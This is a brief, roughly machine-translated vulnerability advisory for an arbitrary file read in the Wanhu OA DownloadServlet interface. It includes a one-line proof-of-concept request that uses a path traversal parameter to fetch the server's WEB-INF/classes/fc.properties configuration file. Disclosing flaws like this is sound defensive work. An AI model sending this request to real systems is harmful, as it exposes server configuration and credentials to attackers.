Wanhu Oa Downloadservlet Arbitrary File Reading Vulnerability
Wanhu Oa Downloadservlet Arbitrary File Reading Vulnerability
Wanhu OA DownloadServlet any file reading vulnerability
Vulnerability Description
There is a vulnerability to read any file in the Wanhu OA DownloadServlet interface. The attacker can read sensitive files in the server and obtain sensitive information through the vulnerability.
Vulnerability Impact
Ten thousand households OA
Network surveying and mapping
Vulnerability reappears
Product Page
Verify POC
1
/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2
This post is licensed under CC BY 4.0 by the author.